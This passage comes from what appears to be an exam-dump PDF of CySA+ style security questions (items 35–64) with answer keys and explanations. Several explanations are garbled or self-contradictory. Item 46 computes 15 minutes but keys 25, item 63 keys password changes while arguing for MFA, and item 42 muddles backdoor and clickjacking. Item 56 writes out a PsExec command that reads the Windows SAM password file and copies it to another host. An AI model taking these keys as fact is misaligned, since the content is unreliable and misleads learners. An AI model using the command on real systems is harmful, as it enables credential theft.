helpful for tracking changes and ensuring compliance, it is not directly linked to reducing the
impact of system failures due to changes.
E) Require diagrams to be completed for all critical systems: While having diagrams of critical
systems is useful for understanding and managing them, it is not a direct method for reducing
the
impact of system failures due to changes. Diagrams are more about documentation and
understanding rather than proactive change management.

35. A company is in the process of implementing a vulnerability management program, and

there are concerns about granting the security team access to sensitive data.
Which of the following scanning methods can be implemented to reduce the access to systems
while providing the most accurate vulnerability scan results?
A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning
Answer: C
Explanation:
Agent-based scanning is a method that involves installing software agents on the target
systems or networks that can perform local scans and report the results to a central server or
console. Agent-based scanning can reduce the access to systems, as the agents do not require
any credentials or permissions to scan the local system or network. Agent-based scanning can
also provide the most accurate vulnerability scan results, as the agents can scan continuously
or on-demand, regardless of the system or network status or location.

36. Following an attack, an analyst needs to provide a summary of the event to the Chief
Information Security Officer. The summary needs to include the who-what-when information and
evaluate the effectiveness of the plans in place.
Which of the following incident management life cycle processes
does this describe?
A. Business continuity plan
B. Lessons learned
C. Forensic analysis
D. Incident response plan
Answer: B
Explanation:
The lessons learned process is the final stage of the incident management life cycle, where the
incident team reviews the incident and evaluates the effectiveness of the response and the
plans in place. The lessons learned report should include the who-what-when information and
any recommendations for improvement123
Reference: 1: What is incident management? Steps, tips, and best practices 2: 5 Steps of the
Incident Management Lifecycle | RSI Security 3: Navigating the Incident Response Life Cycle: A
Comprehensive Guide

37. A systems administrator is reviewing after-hours traffic flows from data-center servers and
sees regular outgoing HTTPS connections from one of the servers to a public IP address. The
server should not be making outgoing connections after hours. Looking closer, the administrator
sees this traffic pattern around the clock during work hours as well.
Which of the following is the most likely explanation?
A. C2 beaconing activity
B. Data exfiltration
C. Anomalous activity on unexpected ports
D. Network host IP address scanning
E. A rogue network device
Answer: A
Explanation:
The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for
command and control, which is a phase of the Cyber Kill Chain that involves the adversary
attempting to establish communication with a successfully exploited target. C2 beaconing
activity is a type of network traffic that indicates a compromised system is sending periodic
messages or signals to an attacker’s system using various protocols, such as HTTP(S), DNS,
ICMP, or UDP. C2 beaconing activity can enable the attacker to remotely control or manipulate
the target system or network using various methods, such as malware callbacks, backdoors,
botnets, or covert channels.

38. A security analyst is reviewing the following alert that was triggered by FIM on a critical
system:
Which of the following best describes the suspicious activity that is occurring?
A. A fake antivirus program was installed by the user.
B. A network drive was added to allow exfiltration of data
C. A new program has been set to execute on system start
D. The host firewall on 192.168.1.10 was disabled.
Answer: C
Explanation:
A new program has been set to execute on system start is the most likely cause of the
suspicious activity that is occurring, as it indicates that the malware has modified the registry
keys of the system to ensure its persistence. File Integrity Monitoring (FIM) is a tool that
monitors changes to files and registry keys on a system and alerts the security analyst of any
unauthorized or malicious modifications. The alert triggered by FIM shows that the malware has
created a new registry key under the Run subkey, which is used to launch programs
automatically when the system starts. The new registry key points to a file named “update.exe”
in the Temp folder, which is likely a malicious executable disguised as a legitimate update file.
Official
Reference: https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-
answered
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-
objectives
https://www.comptia.org/training/books/cysa-cs0-002-study-guide

39. A company that has a geographically diverse workforce and dynamic IPs wants to
implement a vulnerability scanning method with reduced network traffic.
Which of the following would best meet this requirement?
A. External
B. Agent-based
C. Non-credentialed
D. Credentialed
Answer: B
Explanation:
Agent-based vulnerability scanning is a method that involves installing software agents on the
target systems or networks that can perform local scans and report the results to a central
server or console. Agent-based vulnerability scanning can reduce network traffic, as the scans
are performed locally and only the results are transmitted over the network. Agent-based
vulnerability scanning can also provide more accurate and up-to-date results, as the agents can
scan continuously or on-demand, regardless of the system or network status or location.

40. The security analyst received the monthly vulnerability report.

The following findings were included in the report
• Five of the systems only required a reboot to finalize the patch application.
• Two of the servers are running outdated operating systems and cannot be patched
The analyst determines that the only way to ensure these servers cannot be compromised is to
isolate them.
Which of the following approaches will best minimize the risk of the outdated servers being
compromised?
A. Compensating controls
B. Due diligence
C. Maintenance windows
D. Passive discovery
Answer: A
Explanation:
Compensating controls are the best approach to minimize the risk of the outdated servers being
compromised, as they can provide an alternative or additional layer of security when the primary
control is not feasible or effective. Compensating controls are security measures that are
implemented to mitigate the risk of a vulnerability or an attack when the primary control is not
feasible or effective. For example, if the servers are running outdated operating systems and
cannot be patched, a compensating control could be to isolate them from the rest of the
network, or to implement a firewall or an intrusion prevention system to monitor and block any
malicious traffic to or from the servers. Compensating controls can help reduce the likelihood or
impact of an exploit, but they do not eliminate the risk completely. Therefore, the security
analyst should also consider upgrading or replacing the outdated servers as soon as possible.

41. There are several reports of sensitive information being disclosed via file sharing services.
The company would like to improve its security posture against this threat.
Which of the following security controls would best support the company in this scenario?
A. Implement step-up authentication for administrators
B. Improve employee training and awareness
C. Increase password complexity standards
D. Deploy mobile device management
Answer: B
Explanation:
The best security control to implement against sensitive information being disclosed via file
sharing services is to improve employee training and awareness. Employee training and
awareness can help educate employees on the risks and consequences of using file sharing
services for sensitive information, as well as the policies and procedures for handling such
information securely and appropriately. Employee training and awareness can also help foster a
security culture and encourage employees to report any incidents or violations of information
security.

42. A company brings in a consultant to make improvements to its website. After the consultant
leaves. a web developer notices unusual activity on the website and submits a suspicious file
containing the following code to the security team:

Which of the following did the consultant do?

Implanted a backdoor
Implemented privilege escalation
Implemented clickjacking
Patched the web server
Answer: A
Explanation:
The correct answer is A. Implanted a backdoor.
A backdoor is a method that allows an unauthorized user to access a system or network without
the permission or knowledge of the owner. A backdoor can be installed by exploiting a software
vulnerability, by using malware, or by physically modifying the hardware or firmware of the
device. A backdoor can be used for various malicious purposes, such as stealing data, installing
malware, executing commands, or taking control of the system.
In this case, the consultant implanted a backdoor in the website by using an HTML and PHP
code snippet that displays an image of a shutdown button and an alert message that says
“Exit”. However, the code also echoes the remote address of the server, which means that it
sends the IP address of the visitor to the attacker. This way, the attacker can identify and target
the visitors of the website and use their IP addresses to launch further attacks or gain access to
their devices.
The code snippet is an example of a clickjacking attack, which is a type of interface-based
attack that tricks a user into clicking on a hidden or disguised element on a webpage. However,
clickjacking is not the main goal of the consultant, but rather a means to implant the backdoor.
Therefore, option C is incorrect.
Option B is also incorrect because privilege escalation is an attack technique that allows an
attacker to gain higher or more permissions than they are supposed to have on a system or
network. Privilege escalation can be achieved by exploiting a software vulnerability, by using
malware, or by abusing misconfigurations or weak access controls. However, there is no
evidence that the consultant implemented privilege escalation on the website or gained any
elevated privileges.
Option D is also incorrect because patching is a process of applying updates to software to fix
errors, improve performance, or enhance security. Patching can prevent or mitigate various
types of attacks, such as exploits, malware infections, or denial-of-service attacks. However,
there is no indication that the consultant patched the web server or improved its security in any
way.
Reference: 1 What Is a Backdoor & How to Prevent Backdoor Attacks (2023)
2 What is Clickjacking? Tutorial & Examples | Web Security Academy
3 What Is Privilege Escalation and How It Relates to Web Security | Acunetix
4 What Is Patching? | Best Practices For Patch Management - cWatch Blog

43. An incident response analyst is taking over an investigation from another analyst. The
investigation has been going on for the past few days.
Which of the following steps is most important during the transition between the two analysts?
A. Identify and discuss the lessons learned with the prior analyst.
B. Accept all findings and continue to investigate the next item target.
C. Review the steps that the previous analyst followed.
D. Validate the root cause from the prior analyst.
Answer: C
Explanation:
Reviewing the steps that the previous analyst followed is the most important step during the
transition, as it ensures continuity and consistency of the investigation. It also helps the new
analyst to understand the current status, scope, and findings of the investigation, and to avoid
repeating the same actions or missing any important details. The other options are either less
important, premature, or potentially biased.
Reference: CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 4: Incident Response
and Management, page 191. Incident response best practices and tips, Tip 1: Always pack a
jump bag.

44. Legacy medical equipment, which contains sensitive data, cannot be patched.
Which of the following is the best solution to improve the equipment's security posture?
A. Move the legacy systems behind a WAR
B. Implement an air gap for the legacy systems.
C. Place the legacy systems in the perimeter network.
D. Implement a VPN between the legacy systems and the local network.
Answer: B
Explanation:
Implementing an air gap for the legacy systems is the best solution to improve their security
posture. An air gap is a physical separation of a system or network from any other system or
network that may pose a threat. An air gap can prevent any unauthorized access or data
transfer between the isolated system or network and the external environment. Implementing an
air gap for the legacy systems can help to protect them from being exploited by attackers who
may take advantage of their unpatched vulnerabilities.

45. Which of the following threat actors is most likely to target a company due to its
questionable environmental policies?
A. Hacktivist
B. Organized crime
C. Nation-state
D. Lone wolf
Answer: A
Explanation:
Hacktivists are threat actors who use cyberattacks to promote a social or political cause, such
as environmentalism, human rights, or democracy. They may target companies that they
perceive as violating their values or harming the public interest. Hacktivists often use techniques
such as defacing websites, launching denial-of-service attacks, or leaking sensitive data to
expose or embarrass their targets12.
Reference: An introduction to the cyber threat environment, page 3; What is a Threat Actor?
Types & Examples of Cyber Threat Actors, section 2.

46. An organization's email account was compromised by a bad actor. Given the following
Information:

Which of the following is the length of time the team took to detect the threat?
A. 25 minutes
B. 40 minutes
C. 45 minutes
D. 2 hours
Answer: A
Explanation:
According to the given information:
The emails were sent at 8:30 a.m.
The help desk was alerted by recipients at 8:45 a.m.
The difference between these two times is 15 minutes, which means the team took 15 minutes
to detect the threat. However, since this option is not available in the provided choices, it seems
there might be an error in the information provided or the interpretation. Based on the available
options, the closest answer would be: A. 25 minutes.

47. A development team is preparing to roll out a beta version of a web application and wants to
quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting.
Which of the following tools would the security team most likely recommend to perform this test?
A. Has heat
B. OpenVAS
C. OWASP ZAP
D. Nmap
Answer: C
Explanation:
OWASP ZAP (Zed Attack Proxy) is a tool recommended for quickly testing web applications for
vulnerabilities, including SQL injection, path traversal, and cross-site scripting. It is an open-
source web application security scanner that helps identify security issues in web applications
during the development and testing phases.

48. On how many workstations was the malware installed?

According to the file server logs, the malware was installed on 15 workstations.
49. A security analyst must preserve a system hard drive that was involved in a litigation
request.
Which of the following is the best method to ensure the data on the device is not modified?
A. Generate a hash value and make a backup image.
B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data.
Answer: A
Explanation:
Generating a hash value and making a backup image is the best method to ensure the data on
the device is not modified, as it creates a verifiable copy of the original data that can be used for
forensic analysis. Encrypting the device, protecting it with a password, or performing a memory
scan dump do not prevent the data from being altered or deleted.
Verified
Reference: CompTIA CySA+ CS0-002 Certification Study Guide, page 3291

50. Which of the following would eliminate the need for different passwords for a variety or
internal application?
A. CASB
B. SSO
C. PAM
D. MFA
Answer: B
Explanation:
Single Sign-On (SSO) allows users to log in with a single ID and password to access multiple
applications. It eliminates the need for different passwords for various internal applications,
streamlining the authentication process.

51. A security analyst is analyzing the following output from the Spider tab of OWASP ZAP after
a vulnerability scan was completed:

Which of the following options can the analyst conclude based on the provided output?
A. The scanning vendor used robots to make the scanning job faster
B. The scanning job was successfully completed, and no vulnerabilities were detected
C. The scanning job did not successfully complete due to an out of scope error
D. The scanner executed a crawl process to discover pages to be assessed
Answer: D
Explanation:
The output shows the result of using OWASP ZAP’s Spider tab after a vulnerability scan was
completed. The Spider tab allows users to crawl web applications and discover pages and
resources that can be assessed for vulnerabilities. The output shows that the scanner
discovered various pages under different directories, such as /admin/, /blog/, /contact/, etc., as
well as some parameters and forms that can be used for testing inputs and outputs.
Reference: CompTIA Cybersecurity Analyst
(CySA+) Certification Exam Objectives (CS0-002), page 9;
https://www.zaproxy.org/docs/desktop/start/features/spider/

52. A security analyst has identified a new malware file that has impacted the organization. The
malware is polymorphic and has built-in conditional triggers that require a connection to the
internet. The CPU has an idle process of at least 70%.
Which of the following best describes how the security analyst can effectively review the
malware without compromising the organization's network?
A. Utilize an RDP session on an unused workstation to evaluate the malware.
B. Disconnect and utilize an existing infected asset off the network.
C. Create a virtual host for testing on the security analyst workstation.
D. Subscribe to an online service to create a sandbox environment.
Answer: D
Explanation:
A sandbox environment is a safe and isolated way to analyze malware without affecting the
organization’s network. An online service can provide a sandbox environment without requiring
the security analyst to set up a virtual host or use an RDP session. Disconnecting and using an
existing infected asset is risky and may not provide accurate results.
Reference: Malware Analysis: Steps & Examples, Dynamic Analysis

53. The SOC received a threat intelligence notification indicating that an employee's credentials
were found on the dark web. The user's web and log-in activities were reviewed for malicious or
anomalous connections, data uploads/downloads, and exploits. A review of the controls
confirmed multifactor
authentication was enabled.
Which of the following should be done first to mitigate impact to the business networks and
assets?
A. Perform a forced password reset.
B. Communicate the compromised credentials to the user.
C. Perform an ad hoc AV scan on the user's laptop.
D. Review and ensure privileges assigned to the user's account reflect least privilege.
E. Lower the thresholds for SOC alerting of suspected malicious activity.
Answer: A
Explanation:
The first and most urgent step to mitigate the impact of compromised credentials on the dark
web is to perform a forced password reset for the affected user. This will prevent the
cybercriminals from using the stolen credentials to access the company’s network and
systems. Multifactor authentication is a good security measure, but it is not foolproof and can be
bypassed by sophisticated attackers. Therefore, changing the password as soon as possible is
the best practice to reduce the risk of a data breach or other cyber attack123
Reference: 1: How to monitor the dark web for compromised employee credentials 2: How to
prevent corporate credentials ending up on the dark web 3: Data Breach Prevention: Identifying
Leaked Credentials on the Dark Web

54. A security analyst responds to a series of events surrounding sporadic bandwidth

consumption from an endpoint device.
The security analyst then identifies the following additional details:
• Bursts of network utilization occur approximately every seven days.
• The content being transferred appears to be encrypted or obfuscated.
• A separate but persistent outbound TCP connection from the host to infrastructure in a third-
party cloud is in place.
• The HDD utilization on the device grows by 10GB to 12GB over the course of every seven
days.
• Single file sizes are 10GB.
Which of the following describes the most likely cause of the issue?
A. Memory consumption
B. Non-standard port usage
C. Data exfiltration
D. System update
E. Botnet participant
Answer: C
Explanation:
data exfiltration is the unauthorized transfer of data from an organization’s network to an
external destination, usually for malicious purposes such as espionage, sabotage, or theft. The
details given in the question suggest that data exfiltration is occurring from an endpoint device.
The bursts of network utilization every seven days indicate periodic data transfers. The content
being transferred appears to be encrypted or obfuscated to avoid detection or analysis. The
persistent outbound TCP connection from the host to infrastructure in a third-party cloud
indicates a possible command and control channel for an attacker. The HDD utilization on the
device grows by 10GB to 12GB over the course of every seven days, and single file sizes are
10GB, indicating that large amounts of data are being collected and compressed before being
exfiltrated.

55. A security analyst is validating a particular finding that was reported in a web application
vulnerability scan to make sure it is not a false positive.
The security analyst uses the snippet below:

Which of the following vulnerability types is the security analyst validating?

A. Directory traversal
B. XSS
C. XXE
D. SSRF
Answer: B
Explanation:
XSS (cross-site scripting) is the vulnerability type that the security analyst is validating, as the
snippet shows an attempt to inject a script tag into the web application. XSS is a web security
vulnerability that allows an attacker to execute arbitrary JavaScript code in the browser of
another user who visits the vulnerable website. XSS can be used to perform various malicious
actions, such as stealing cookies, session hijacking, phishing, or defacing websites. The other
vulnerability types are not relevant to the snippet, as they involve different kinds of attacks.
Directory traversal is an attack that allows an attacker to access files and directories that are
outside of the web root folder. XXE (XML external entity) injection is an attack that allows an
attacker to interfere with an application’s processing of XML data, and potentially access files
or systems. SSRF (server-side request forgery) is an attack that allows an attacker to induce the
server-side application to make requests to an unintended location. Official
Reference: https://portswigger.net/web-security/xxe
https://portswigger.net/web-security/ssrf
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Ch
eat_Sheet.html

56. While reviewing system logs, a network administrator discovers the following entry:
Which of the following occurred?
A. An attempt was made to access a remote workstation.
B. The PsExec services failed to execute.
C. A remote shell failed to open.
D. A user was trying to download a password file from a remote system.
Answer: D
Explanation:
The output shows an entry from a system log that indicates a user was trying to download a
password file from a remote system using PsExec. PsExec is a command-line tool that allows
users to execute processes on remote systems. The entry shows that the user “administrator”
tried to run PsExec with the following parameters: \192.168.1.100 -u administrator -p P@ssw0rd
-c cmd.exe /c type c:\windows\system32\config\SAM > \192.168.1.101\c$\temp\sam.txt This
means that the user tried to connect to the remote system with IP address 192.168.1.100 using
the username “administrator” and password “P@ssw0rd”, copy cmd.exe to the remote system,
and execute it with the command “type c:\windows\system32\config\SAM >
\192.168.1.101\c$\temp\sam.txt”. This command attempts to read the SAM file, which contains
hashed passwords of local users, and write it to a file on another system with IP address
192.168.1.101.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002),
page 8; https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

57. An analyst is designing a message system for a bank. The analyst wants to include a
feature that allows the recipient of a message to prove to a third party that the message came
from the sender.
Which of the following information security goals is the analyst most likely trying to achieve?
A. Non-repudiation
B. Authentication
C. Authorization
D. Integrity
Answer: A
Explanation:
Non-repudiation ensures that a message sender cannot deny the authenticity of their sent
message.
This is crucial in banking communications for legal and security reasons.
The goal of allowing a message recipient to prove the message's origin is non-repudiation. This
ensures that the sender cannot deny the authenticity of their message. Non-repudiation is a
fundamental aspect of secure messaging systems, especially in banking and financial
communications.

58. A cybersecurity analyst is tasked with scanning a web application to understand where the
scan will go and whether there are URIs that should be denied access prior to more in-depth
scanning.
Which of following best fits the type of scanning activity requested?
A. Uncredentialed scan
B. Discqyery scan
C. Vulnerability scan
D. Credentialed scan
Answer: B
Explanation:
A discovery scan is a type of web application scanning that involves identifying active, internet-
facing web applications and their URIs, without performing any intrusive or in-depth tests. This
type of scan can help to understand the scope and structure of a web application before
conducting more comprehensive vulnerability scans12.
Reference: 1: OWASP Vulnerability Scanning Tools 2: CISA Web Application Scanning

59. Which of the following will most likely cause severe issues with authentication and logging?
A. Virtualization
B. Multifactor authentication
C. Federation
D. Time synchronization
Answer: D
Explanation:
Time synchronization issues can cause severe problems with authentication and logging. If
system clocks are not properly synchronized, it can lead to discrepancies in log timestamps,
making it difficult to correlate events across different systems. Additionally, time-related
discrepancies can affect authentication mechanisms that rely on time-based tokens, such as
those used in multifactor authentication, leading to failures and security gaps.

60. The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?
A. An output of characters > and " as the parameters used m the attempt
B. The vulnerable parameter ID hccp://l72.31.15.2/1.php?id-2 and unfiltered characters returned
C. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
D. The vulnerable parameter and characters > and " with a reflected XSS attempt
Answer: D
Explanation:
A cross-site scripting (XSS) attack is a type of web application attack that injects malicious code
into a web page that is then executed by the browser of a victim user. A reflected XSS attack is
a type of XSS attack where the malicious code is embedded in a URL or a form parameter that
is sent to the web server and then reflected back to the user’s browser. In this case, the Nmap
scan shows that the web server is vulnerable to a reflected XSS attack, as it returns the
characters > and " without any filtering or encoding. The vulnerable parameter is id in the URL
http://172.31.15.2/1.php?id=2.

61. During the forensic analysis of a compromised machine, a security analyst discovers some
binaries
that are exhibiting abnormal behaviors. After extracting the strings, the analyst finds unexpected
content.
Which of the following is the next step the analyst should take?
A. Validate the binaries' hashes from a trusted source.
B. Use file integrity monitoring to validate the digital signature
C. Run an antivirus against the binaries to check for malware.
D. Only allow binaries on the approve list to execute.
Answer: A
Explanation:
Validating the binaries’ hashes from a trusted source is the next step the analyst should take
after discovering some binaries that are exhibiting abnormal behaviors and finding unexpected
content in their strings. A hash is a fixed-length value that uniquely represents the contents of a
file or message. By comparing the hashes of the binaries on the compromised machine with the
hashes of the original or legitimate binaries from a trusted source, such as the software vendor
or repository, the analyst can determine whether the binaries have been modified or replaced by
malicious code. If the hashes do not match, it indicates that the binaries have been tampered
with and may contain malware.

62. An organization is conducting a pilot deployment of an e-commerce application. The

application's source code is not available.
Which of the following strategies should an analyst recommend to evaluate the security of the
software?
A. Static testing
B. Vulnerability testing
C. Dynamic testing
D. Penetration testing
Answer: C
Explanation:
Dynamic testing involves assessing the software while it is running. This would include running
a variety of tests designed to identify potential security vulnerabilities from the outside, without
needing access to the underlying source code.

63. An organization was compromised, and the usernames and passwords of all employees
were leaked online.
Which of the following best describes the remediation that could reduce the impact of this
situation?
A. Multifactor authentication
B. Password changes
C. System hardening
D. Password encryption
Answer: B
Explanation:
Multifactor authentication (MFA) is a security method that requires users to provide two or more
pieces of evidence to verify their identity, such as a password, a PIN, a fingerprint, or a one-time
code. MFA can reduce the impact of a credential leak because even if the attackers have the
usernames and passwords of the employees, they would still need another factor to access the
organization’s systems and resources. Password changes, system hardening, and password
encryption are also good security practices, but they do not address the immediate threat of
compromised credentials.
Reference: CompTIA CySA+ Certification Exam Objectives, [What Is Multifactor Authentication
(MFA)?]

64. Which of the following describes the difference between intentional and unintentional insider
threats?
A. Their access levels will be different
B. The risk factor will be the same
C. Their behavior will be different
D. The rate of occurrence will be the same
Answer: C
Explanation:
The difference between intentional and unintentional insider threats is their behavior. Intentional
insider threats are malicious actors who deliberately misuse their access to harm the
organization or its assets. Unintentional insider threats are careless or negligent users who
accidentally compromise the security of the organization or its assets. Their access levels, risk
factors, and rates of occurrence may vary depending on various factors, but their behavior is the
main distinction.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002),
page 12;
https://www.cisa.gov/sites/default/files/publications/Insider_Threat_Mitigation_Guide_508.pdf
 More Hot Exams are available.

350-401 ENCOR Exam Dumps

350-801 CLCOR Exam Dumps

200-301 CCNA Exam Dumps

Powered by TCPDF (www.tcpdf.org)